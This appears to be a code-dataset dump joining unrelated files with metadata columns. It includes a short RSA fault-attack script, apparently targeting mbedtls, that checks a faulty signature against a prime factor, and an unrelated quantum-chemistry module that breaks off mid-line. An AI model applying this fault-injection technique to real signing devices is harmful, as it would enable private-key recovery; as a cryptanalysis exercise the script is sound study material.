from target_extraction.allen.modules.target_position_weight.relative_target_position_weight import RelativeTargetPositionWeight | 119 | 127 | 0.936975 | 27 | 238 | 7.851852 | 0.407407 | 0.264151 | 0.377358 | 0.235849 | 0.490566 | 0.490566 | 0.490566 | 0.490566 | 0 | 0 | 0 | 0 | 0.029412 | 238 | 2 | 127 | 119 | 0.917749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
28f79fe35647bdb901de1ccb693d0e9b81eb7a9e | 1,868 | py | Python | factor_signature.py | aditi-gupta/rsa-mbedtls | f1f226b8456ebfa868b0e04ffed14ac507637796 | [
"Apache-2.0"
] | null | null | null | factor_signature.py | aditi-gupta/rsa-mbedtls | f1f226b8456ebfa868b0e04ffed14ac507637796 | [
"Apache-2.0"
] | null | null | null | factor_signature.py | aditi-gupta/rsa-mbedtls | f1f226b8456ebfa868b0e04ffed14ac507637796 | [
"Apache-2.0"
] | null | null | null | e = int("010001", 16)
s = int("7BAFF51CA54182F5A70181B0EC1F8603C1A39324D5A2CB49422886AE1FFDB49E009AF19ABD7D772E199BEC3046690494134B75E1201E6856D99887DCA32DBB403CF99553678D458748AA43C90A387AD3FF767F7314BF05FC1880347072706809BF3BCBDB59EA54032E5485869E7063B3EFDA8C5A6D19D1A5B3B279F2E70AF90B4C2FE485856639273539EEE50B6232EFC9D75903884F315FC377D842F948088F7E259F36BD4FECD1EB770D8FB24CE66E945E57DDE29E3EF1FB327C675940BCEE04A70D18BDC74BDE31CC32894280E2722A19B7D5FE15474E9ED5DCD51C264C7F8FA13A5372698752AB0658D857181435B430D58746FA64BE492E8D3D7D9F33A2", 16) #you get this when you replace *0x6df4e0 with 0x8
m = int("3031300d0609608648016503040201050004207e6bb673f061cfd23cba009e648143fb07ac77dcd1681f6a9af9d5fe7c0f7f4b", 16)
n = int("AE1EC41FDD978C18CB43F9587F9B85DF804603100611497DCB445D157E44E717C78D53FAC3644DEA302645F6CFF852A785C3DAEA525BE01A4B1960D6512D97C677436ED17D03A55DDD8E41D737456C2B1512D533806EB048C5570269CBDFABB5E335821CE69C892A825A3896FC46990A8F6FECC759DAD9D6FD76BBF55BAA34B0789CACE898B6CC8CDBB50A0BFE7073A31DAF0B67845F76B71D42942B03FC02D6D68789C6CEF502C39AA0FB392E5E84BD1581E7295BDF6C45463FEA20A5220413381B82A72F95B1BB29AC6E833B70EB5B9F9D43B4D56A94ECBD02C1CBC8C8EED903485BD2A379A8B81B8FE20216EE6019A5F19656A483CCD9C23EB3B17678050B", 16)
p = int("F5D2772FA3DA0B5AB6A0DEE2897983D6EB0EB9B63A94860EAD14271669C2DDEB089569971093DBBDC46C7E230709FE1BE1967051FB6113F4D836CF792AE3893E487851C500F022E942E2C91FF5BC391E5401F2C41CFE9744AA76048578CC1FEB59B0B705834EE672CE7AE53B06D78831A3701BB58A0746C3B492D8B7DCDDB133", 16)
q = int("B5544FFA117E94D9CA58FF9DB5CBA8E498D4B8192CA578C2D4E1D8828B0329EDE2CA737BBBB3AC25DD11DF04EBE1971D25B0AC3C73D26018A3C52381A520EACEF826ACBA73EBB5EA3569872FEBEC53C6B188FA6DD3B8343C22652C4A5CF2FC34EBCEA888037DBEDA22C55076A15AE1A8827F620AA64A775021851B0BF2808CC9", 16)
# print (s%n)
print ((pow(s, e)-m)%q)
# print (s%q)
# print n%p
# print (n%q) | 155.666667 | 577 | 0.941649 | 51 | 1,868 | 34.490196 | 0.470588 | 0.006822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.57967 | 0.025696 | 1,868 | 12 | 578 | 155.666667 | 0.386813 | 0.050321 | 0 | 0 | 0 | 0 | 0.928814 | 0.925424 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e903dc507222996d3f19c9a39f65a66f409182ea | 33,139 | py | Python | src/fqe/algorithm/brillouin_calculator.py | rmlarose/OpenFermion-FQE | 54489126725fe3bb83218b6fde9d44f6cf130359 | [
"Apache-2.0"
] | null | null | null | src/fqe/algorithm/brillouin_calculator.py | rmlarose/OpenFermion-FQE | 54489126725fe3bb83218b6fde9d44f6cf130359 | [
"Apache-2.0"
] | null | null | null | src/fqe/algorithm/brillouin_calculator.py | rmlarose/OpenFermion-FQE | 54489126725fe3bb83218b6fde9d44f6cf130359 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Infrastructure for compute [rdo, A] with FQE. RDO is a 2-body operator
and A is a 2-body operator."""
import copy
from itertools import product
import numpy as np
import openfermion as of
import fqe
from fqe.wavefunction import Wavefunction
from fqe.hamiltonians.restricted_hamiltonian import RestrictedHamiltonian
try:
from joblib import Parallel, delayed
PARALLELIZABLE = True
except ImportError:
PARALLELIZABLE = False
def get_fermion_op(coeff_tensor) -> of.FermionOperator:
    r"""Convert a 2- or 4-index coefficient tensor into a FermionOperator.

    Given A[i, j, k, l] of A = \sum_{ijkl}A[i, j, k, l]i^ j^ k^ l
    return the FermionOperator A.  A 2-index tensor is treated as a
    one-body operator \sum_{ij}A[i, j] i^ j.

    Args:
        coeff_tensor: Coefficients for the 4-mode (or 2-mode) operator.

    Returns:
        The corresponding openfermion.FermionOperator.

    Raises:
        ValueError: if the tensor is neither 2- nor 4-dimensional.
    """
    ndim = len(coeff_tensor.shape)

    if ndim == 4:
        dim = coeff_tensor.shape[0]
        result = of.FermionOperator()
        for i, j, k, l in product(range(dim), repeat=4):
            # i^ i^ (and k k) annihilate identically, so those terms are
            # skipped outright.
            if i == j or k == l:
                continue
            result += of.FermionOperator(
                ((i, 1), (j, 1), (k, 0), (l, 0)),
                coefficient=coeff_tensor[i, j, k, l])
        return result

    if ndim == 2:
        dim = coeff_tensor.shape[0]
        result = of.FermionOperator()
        for i, j in product(range(dim), repeat=2):
            result += of.FermionOperator(((i, 1), (j, 0)),
                                         coefficient=coeff_tensor[i, j])
        return result

    raise ValueError(
        "Arg `coeff_tensor` should have dimension 2 or 4 but has dimension"
        f" {len(coeff_tensor.shape)}.")
def get_acse_residual_fqe(fqe_wf: Wavefunction, fqe_ham: RestrictedHamiltonian,
                          norbs: int) -> np.ndarray:
    """Get the ACSE block by using reduced density operators that are Sz spin
    adapted

    R^{ij}_{lk} = <psi | [i^ j^ k l, A] | psi>

    alpha-alpha, beta-beta, alpha-beta, and beta-alpha blocks

    we do not compression over alpha-alpha or beta-beta so these are still
    norbs**2 in linear dimension. In other words, we do computation on
    elements we know should be zero. This is for simplicity in the code.

    Args:
        fqe_wf: fqe.Wavefunction object to calculate expectation value with
        fqe_ham: fqe.RestrictedHamiltonian operator corresponding to a chemical
            Hamiltonian
        norbs: Number of orbitals. Number of spatial orbitals

    Returns:
        Gradient of the i^ j^ k l operator as a complex ndarray of shape
        (2 * norbs,) * 4 in the spin-orbital basis (alpha orbitals on even
        indices, beta orbitals on odd indices).
    """
    # Spin-blocked accumulators indexed by spatial orbitals.
    acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    # A|psi>, computed once and reused for every matrix element below.
    fqe_appA = fqe_wf.apply(fqe_ham)
    for p, q, r, s in product(range(norbs), repeat=4):
        # alpha-alpha block real.  Same-spin terms vanish identically when
        # p == q or r == s (i^ i^ = 0), so the aa/bb blocks are only
        # evaluated otherwise.
        if p != q and r != s:
            rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
            # 1j * (rdo - rdo^dag) is Hermitian by construction.
            rdo = 1j * (of.FermionOperator(rdo) -
                        of.hermitian_conjugated(of.FermionOperator(rdo)))
            val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
            # rdo is Hermitian, so <wf|rdo|appA> = conj(<appA|rdo|wf>).
            val2 = np.conjugate(val1)
            acse_aa[p, q, r, s] = (val2 - val1) / 2j

            # alpha-alpha block imag: Hermitian combination rdo + rdo^dag.
            rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
            rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
                of.FermionOperator(rdo))
            val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
            val2 = np.conjugate(val1)
            acse_aa[p, q, r, s] += (val2 - val1) / 2

            # beta-beta block real (odd spin-orbital indices)
            rdo = (
                (2 * p + 1, 1),
                (2 * q + 1, 1),
                (2 * r + 1, 0),
                (2 * s + 1, 0),
            )
            rdo = 1j * (of.FermionOperator(rdo) -
                        of.hermitian_conjugated(of.FermionOperator(rdo)))
            val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
            val2 = np.conjugate(val1)
            acse_bb[p, q, r, s] += (val2 - val1) / 2j

            # beta-beta block imag
            rdo = (
                (2 * p + 1, 1),
                (2 * q + 1, 1),
                (2 * r + 1, 0),
                (2 * s + 1, 0),
            )
            rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
                of.FermionOperator(rdo))
            val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
            val2 = np.conjugate(val1)
            acse_bb[p, q, r, s] += (val2 - val1) / 2

        # alpha-beta block real (no p != q / r != s restriction: the two
        # creation operators act on different spin sectors).
        rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
        rdo = 1j * (of.FermionOperator(rdo) -
                    of.hermitian_conjugated(of.FermionOperator(rdo)))
        val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
        val2 = np.conjugate(val1)
        acse_ab[p, q, r, s] += (val2 - val1) / 2j

        # alpha-beta block imag
        rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
        rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
            of.FermionOperator(rdo))
        val1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(rdo))
        val2 = np.conjugate(val1)  # fqe.util.vdot(fqe_wf.apply(rdo), fqe_appA)
        acse_ab[p, q, r, s] += (val2 - val1) / 2

    # unroll residual blocks into full matrix; the remaining mixed-spin
    # blocks follow from fermionic antisymmetry of the index pairs.
    acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
                             dtype=np.complex128)
    acse_residual[::2, ::2, ::2, ::2] = acse_aa
    acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
    acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
    acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
    acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
    acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
        "ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
    return acse_residual
def get_tpdm_grad_fqe(fqe_wf: Wavefunction, acse_res_tensor: np.ndarray,
                      norbs: int) -> np.ndarray:
    r"""Compute the acse gradient <psi [rdo, A] psi>

    alpha-alpha, beta-beta, alpha-beta, and beta-alpha blocks

    d D^{pq}_{rs} / d \lambda = <psi(lamba)|[p^ q^ s r, A]| psi(lambda)>

    Args:
        fqe_wf: fqe.Wavefunction object to calculate expectation value with
        acse_res_tensor: 4-index spin-orbital coefficient tensor defining the
            two-body operator A
        norbs: Number of orbitals. Number of spatial orbitals

    Returns:
        Gradient of the p^ q^ s r operator as a complex ndarray of shape
        (2 * norbs,) * 4 (alpha orbitals on even indices, beta on odd).
    """
    # Sanity counter: verifies every (p, q, r, s) element is visited exactly
    # once when pairing each operator with its Hermitian partner below.
    four_tensor_counter = np.zeros_like(acse_res_tensor)
    s_ops = []
    s_op_total = of.FermionOperator()
    for p, q, r, s in product(range(2 * norbs), repeat=4):
        # Visit each (pq, sr) composite-index pair once; the transposed
        # element (s, r, q, p) supplies the Hermitian-conjugate partner.
        if p * 2 * norbs + q >= s * 2 * norbs + r:
            if p * 2 * norbs + q != s * 2 * norbs + r:
                four_tensor_counter[p, q, r, s] += 1
                four_tensor_counter[s, r, q, p] += 1
                # Skip numerically-zero coefficients.
                if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
                    op = ((p, 1), (q, 1), (r, 0), (s, 0))
                    fop1 = of.FermionOperator(
                        op, coefficient=acse_res_tensor[p, q, r, s])
                    op = ((s, 1), (r, 1), (q, 0), (p, 0))
                    fop2 = of.FermionOperator(
                        op, coefficient=acse_res_tensor[s, r, q, p])
                    s_ops.append((fop1, fop2))
                    s_op_total += fop2
                    s_op_total += fop1
            else:
                # Diagonal composite index: the operator is its own partner.
                four_tensor_counter[p, q, r, s] += 1
                if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
                    op = ((p, 1), (q, 1), (r, 0), (s, 0))
                    fop1 = of.FermionOperator(
                        op, coefficient=acse_res_tensor[p, q, r, s])
                    s_ops.append((fop1, of.FermionOperator()))
                    s_op_total += fop1

    assert np.allclose(four_tensor_counter, 1)

    # Accumulate 1j * A |psi> term by term.
    fqe_appS = copy.deepcopy(fqe_wf)
    fqe_appS.set_wfn("zero")
    for op1, op2 in s_ops:
        fqe_appS += fqe_wf.apply(1j * (op1 + op2))

    # Spin-blocked accumulators indexed by spatial orbitals.
    acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    for p, q, r, s in product(range(norbs), repeat=4):
        # alpha-beta block real
        rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
        rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
            of.FermionOperator(rdo))
        fqe_wf_rdo = fqe_wf.apply(rdo)
        val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
        val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
        acse_ab[p, q, r, s] += (val2 - val1) / 2j

        # alpha-beta block imag
        rdo = ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0))
        rdo = 1j * (of.FermionOperator(rdo) -
                    of.hermitian_conjugated(of.FermionOperator(rdo)))
        fqe_wf_rdo = fqe_wf.apply(rdo)
        val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
        val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
        acse_ab[p, q, r, s] += (val4 - val3) / -2

        # alpha-alpha block real
        rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
        rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
            of.FermionOperator(rdo))
        fqe_wf_rdo = fqe_wf.apply(rdo)
        val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
        val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
        acse_aa[p, q, r, s] += (val2 - val1) / 2j

        # alpha-alpha block imag
        rdo = ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0))
        rdo = 1j * (of.FermionOperator(rdo) -
                    of.hermitian_conjugated(of.FermionOperator(rdo)))
        fqe_wf_rdo = fqe_wf.apply(rdo)
        val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
        val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
        acse_aa[p, q, r, s] += (val4 - val3) / -2

        # beta-beta block real
        rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
        rdo = of.FermionOperator(rdo) + of.hermitian_conjugated(
            of.FermionOperator(rdo))
        fqe_wf_rdo = fqe_wf.apply(rdo)
        val1 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
        val2 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
        acse_bb[p, q, r, s] += (val2 - val1) / 2j

        # beta-beta block imag
        rdo = ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0))
        rdo = 1j * (of.FermionOperator(rdo) -
                    of.hermitian_conjugated(of.FermionOperator(rdo)))
        fqe_wf_rdo = fqe_wf.apply(rdo)
        val3 = fqe.util.vdot(fqe_appS, fqe_wf_rdo)
        val4 = fqe.util.vdot(fqe_wf_rdo, fqe_appS)
        acse_bb[p, q, r, s] += (val4 - val3) / -2

    # unroll residual blocks into full matrix; the remaining mixed-spin
    # blocks follow from fermionic antisymmetry of the index pairs.
    acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
                             dtype=np.complex128)
    acse_residual[::2, ::2, ::2, ::2] = acse_aa
    acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
    acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
    acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
    acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
    acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
        "ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
    return acse_residual
def _acse_residual_atomic(p, q, r, s, fqe_appA, fqe_wf):
    """Compute one (p, q, r, s) element of the spin-blocked ACSE residual.

    Worker routine for the joblib-parallel residual calculation.  For each
    spin block (aa, bb, ab) it evaluates expectation values of the
    anti-Hermitian combination 1j * (O - O^dag) and the Hermitian
    combination O + O^dag of the reduced density operator against |fqe_wf>
    and fqe_appA, yielding the two parts of the residual element.
    """

    def _block_parts(ops):
        # ops: creation/annihilation index tuple for one spin block.
        fop = of.FermionOperator(ops)
        # "real" part of the residual element: 1j * (O - O^dag), ".../2j".
        antiherm = 1j * (fop - of.hermitian_conjugated(fop))
        v1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(antiherm))
        v2 = fqe.util.vdot(fqe_wf.apply(antiherm), fqe_appA)
        part_i = (v2 - v1) / 2j
        # "imag" part of the residual element: O + O^dag, ".../2".
        herm = fop + of.hermitian_conjugated(fop)
        v1 = fqe.util.vdot(fqe_appA, fqe_wf.apply(herm))
        v2 = fqe.util.vdot(fqe_wf.apply(herm), fqe_appA)
        part_r = (v2 - v1) / 2
        return part_i, part_r

    # alpha-alpha block (even spin orbitals)
    acse_aa_i, acse_aa_r = _block_parts(
        ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0)))
    # beta-beta block (odd spin orbitals)
    acse_bb_i, acse_bb_r = _block_parts(
        ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0)))
    # alpha-beta block (mixed spin)
    acse_ab_i, acse_ab_r = _block_parts(
        ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0)))

    return (
        p,
        q,
        r,
        s,
        acse_aa_i,
        acse_aa_r,
        acse_bb_i,
        acse_bb_r,
        acse_ab_i,
        acse_ab_r,
    )
def get_acse_residual_fqe_parallel(fqe_wf: Wavefunction,
                                   fqe_ham: RestrictedHamiltonian,
                                   norbs: int) -> np.ndarray:
    """Get the ACSE block by using reduced density operators that are Sz spin
    adapted.  Joblib-parallel version of ``get_acse_residual_fqe``.

    R^{ij}_{lk} = <psi | [i^ j^ k l, A] | psi>

    alpha-alpha, beta-beta, alpha-beta, and beta-alpha blocks

    we do not compression over alpha-alpha or beta-beta so these are still
    norbs**2 in linear dimension. In other words, we do computation on
    elements we know should be zero. This is for simplicity in the code.

    Args:
        fqe_wf: fqe.Wavefunction object to calculate expectation value with
        fqe_ham: fqe.RestrictedHamiltonian operator corresponding to a chemical
            Hamiltonian
        norbs: Number of orbitals. Number of spatial orbitals

    Returns:
        Gradient of the i^ j^ k l operator

    Raises:
        ImportError: if joblib is not available.
    """
    if not PARALLELIZABLE:
        raise ImportError("Joblib is not available")

    # Spin-blocked accumulators indexed by spatial orbitals.
    acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    # A|psi>, computed once and shared by all worker tasks.
    fqe_appA = fqe_wf.apply(fqe_ham)

    # Fan the (p, q, r, s) elements out to joblib workers; each task returns
    # its indices plus the two parts of the aa/bb/ab block elements.
    # NOTE(review): n_jobs is hard-coded to 11 here, while the tpdm gradient
    # version uses n_jobs=-1 -- confirm whether this is intentional.
    with Parallel(n_jobs=11, batch_size=norbs) as parallel:
        result = parallel(
            delayed(_acse_residual_atomic)(p, q, r, s, fqe_appA, fqe_wf)
            for p, q, r, s in product(range(norbs), repeat=4))
    for resval in result:
        p, q, r, s = resval[:4]
        # Recombine the two returned contributions per spin block.
        acse_aa[p, q, r, s] = resval[4] + resval[5]
        acse_bb[p, q, r, s] = resval[6] + resval[7]
        acse_ab[p, q, r, s] = resval[8] + resval[9]

    # unroll residual blocks into full matrix; the remaining mixed-spin
    # blocks follow from fermionic antisymmetry of the index pairs.
    acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
                             dtype=np.complex128)
    acse_residual[::2, ::2, ::2, ::2] = acse_aa
    acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
    acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
    acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
    acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
    acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
        "ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
    return acse_residual
def _get_tpdm_grad_fqe_atomic(p, q, r, s, fqe_appS, fqe_wf):
    """Compute one (p, q, r, s) element of the spin-blocked 2-RDM gradient.

    Worker routine for the joblib-parallel 2-RDM gradient.  For each spin
    block (aa, bb, ab) it evaluates expectation values of the Hermitian
    combination O + O^dag and the anti-Hermitian combination
    1j * (O - O^dag) of the reduced density operator between fqe_appS
    (i * A |psi>) and |fqe_wf>.
    """

    def _block_parts(ops):
        # ops: creation/annihilation index tuple for one spin block.
        fop = of.FermionOperator(ops)
        # Hermitian combination O + O^dag: ".../2j" contribution.
        herm = fop + of.hermitian_conjugated(fop)
        herm_wf = fqe_wf.apply(herm)
        part_i = (fqe.util.vdot(herm_wf, fqe_appS) -
                  fqe.util.vdot(fqe_appS, herm_wf)) / 2j
        # Anti-Hermitian combination 1j * (O - O^dag): ".../-2" contribution.
        antiherm = 1j * (fop - of.hermitian_conjugated(fop))
        antiherm_wf = fqe_wf.apply(antiherm)
        part_r = (fqe.util.vdot(antiherm_wf, fqe_appS) -
                  fqe.util.vdot(fqe_appS, antiherm_wf)) / -2
        return part_r, part_i

    # alpha-beta block (mixed spin)
    acse_ab_r, acse_ab_i = _block_parts(
        ((2 * p, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s, 0)))
    # alpha-alpha block (even spin orbitals)
    acse_aa_r, acse_aa_i = _block_parts(
        ((2 * p, 1), (2 * q, 1), (2 * r, 0), (2 * s, 0)))
    # beta-beta block (odd spin orbitals)
    acse_bb_r, acse_bb_i = _block_parts(
        ((2 * p + 1, 1), (2 * q + 1, 1), (2 * r + 1, 0), (2 * s + 1, 0)))

    return (
        p,
        q,
        r,
        s,
        acse_aa_r,
        acse_aa_i,
        acse_bb_r,
        acse_bb_i,
        acse_ab_r,
        acse_ab_i,
    )
def get_tpdm_grad_fqe_parallel(fqe_wf: Wavefunction,
                               acse_res_tensor: np.ndarray,
                               norbs: int) -> np.ndarray:
    r"""Compute the acse gradient <psi [rdo, A] psi>.  Joblib-parallel
    version of ``get_tpdm_grad_fqe``.

    d D^{pq}_{rs} / d \lambda = <psi(lamba)|[p^ q^ s r, A]| psi(lambda)>

    Args:
        fqe_wf: fqe.Wavefunction object to calculate expectation value with
        acse_res_tensor: 4-index spin-orbital coefficient tensor defining the
            two-body operator A
        norbs: Number of orbitals. Number of spatial orbitals

    Returns:
        Gradient of the p^ q^ s r operator

    Raises:
        ImportError: if joblib is not available.
    """
    if not PARALLELIZABLE:
        raise ImportError("Joblib was not imported")

    # Sanity counter: verifies every (p, q, r, s) element is visited exactly
    # once when pairing each operator with its Hermitian partner below.
    four_tensor_counter = np.zeros_like(acse_res_tensor)
    s_ops = []
    for p, q, r, s in product(range(2 * norbs), repeat=4):
        # Visit each (pq, sr) composite-index pair once; the transposed
        # element (s, r, q, p) supplies the Hermitian-conjugate partner.
        if p * 2 * norbs + q >= s * 2 * norbs + r:
            if p * 2 * norbs + q != s * 2 * norbs + r:
                four_tensor_counter[p, q, r, s] += 1
                four_tensor_counter[s, r, q, p] += 1
                # Skip numerically-zero coefficients.
                if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
                    op = ((p, 1), (q, 1), (r, 0), (s, 0))
                    fop1 = of.FermionOperator(
                        op, coefficient=acse_res_tensor[p, q, r, s])
                    op = ((s, 1), (r, 1), (q, 0), (p, 0))
                    fop2 = of.FermionOperator(
                        op, coefficient=acse_res_tensor[s, r, q, p])
                    s_ops.append((fop1, fop2))
            else:
                # Diagonal composite index: the operator is its own partner.
                four_tensor_counter[p, q, r, s] += 1
                if abs(acse_res_tensor[p, q, r, s]) > 1.0e-12:
                    op = ((p, 1), (q, 1), (r, 0), (s, 0))
                    fop1 = of.FermionOperator(
                        op, coefficient=acse_res_tensor[p, q, r, s])
                    s_ops.append((fop1, of.FermionOperator()))

    assert np.allclose(four_tensor_counter, 1)

    # Accumulate 1j * A |psi> term by term.
    fqe_appS = copy.deepcopy(fqe_wf)
    fqe_appS.set_wfn("zero")
    for op1, op2 in s_ops:
        fqe_appS += fqe_wf.apply(1j * (op1 + op2))

    # Spin-blocked accumulators indexed by spatial orbitals.
    acse_aa = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_bb = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    acse_ab = np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
    # Fan the (p, q, r, s) elements out to joblib workers; each task returns
    # its indices plus the two parts of the aa/bb/ab block elements.
    with Parallel(n_jobs=-1) as parallel:
        result = parallel(
            delayed(_get_tpdm_grad_fqe_atomic)(p, q, r, s, fqe_appS, fqe_wf)
            for p, q, r, s in product(range(norbs), repeat=4))
    for resval in result:
        p, q, r, s = resval[:4]
        # Recombine the two returned contributions per spin block.
        acse_aa[p, q, r, s] = resval[4] + resval[5]
        acse_bb[p, q, r, s] = resval[6] + resval[7]
        acse_ab[p, q, r, s] = resval[8] + resval[9]

    # unroll residual blocks into full matrix; the remaining mixed-spin
    # blocks follow from fermionic antisymmetry of the index pairs.
    acse_residual = np.zeros((2 * norbs, 2 * norbs, 2 * norbs, 2 * norbs),
                             dtype=np.complex128)
    acse_residual[::2, ::2, ::2, ::2] = acse_aa
    acse_residual[1::2, 1::2, 1::2, 1::2] = acse_bb
    acse_residual[::2, 1::2, 1::2, ::2] = acse_ab
    acse_residual[::2, 1::2, ::2, 1::2] = np.einsum("ijkl->ijlk", -acse_ab)
    acse_residual[1::2, ::2, ::2, 1::2] = np.einsum("ijkl->jilk", acse_ab)
    acse_residual[1::2, ::2, 1::2, ::2] = np.einsum(
        "ijkl->ijlk", -acse_residual[1::2, ::2, ::2, 1::2])
    return acse_residual
def two_rdo_commutator(two_body_tensor: np.ndarray, tpdm: np.ndarray,
                       d3: np.ndarray) -> np.ndarray:
    r"""
    Calculate <psi | [p^ q^ r s, A] | psi> for a general two-body operator

    A = \sum_{ijkl}A^{ij}_{lk}i^ j^ k l

    where A^{ij}_{lk} is an arbitrary 4-index tensor (no symmetry assumed).

    Args:
        two_body_tensor: 4-tensor of coefficients of A
        tpdm: spin-orbital two-RDM p^ q^ r s corresponding to (1'2'2 1)
        d3: spin-orbital three-RDM p^ q^ r^ s t u corresponding to (1'2'3'32 1)
    """
    dim = tpdm.shape[0]
    result = np.zeros((dim, dim, dim, dim), dtype=tpdm.dtype)
    for p, q, r, s in product(range(dim), repeat=4):
        val = 0.
        # Double-contraction terms against the 2-RDM.
        # kdelta(i,r) kdelta(j,s) cre(p) cre(q) des(k) des(l)
        val -= np.einsum('kl,kl', two_body_tensor[r, s], tpdm[p, q],
                         optimize=True)
        # kdelta(i,s) kdelta(j,r) cre(p) cre(q) des(k) des(l)
        val += np.einsum('kl,kl', two_body_tensor[s, r], tpdm[p, q],
                         optimize=True)
        # kdelta(k,p) kdelta(l,q) cre(i) cre(j) des(r) des(s)
        val += np.einsum('ij,ij', two_body_tensor[:, :, p, q],
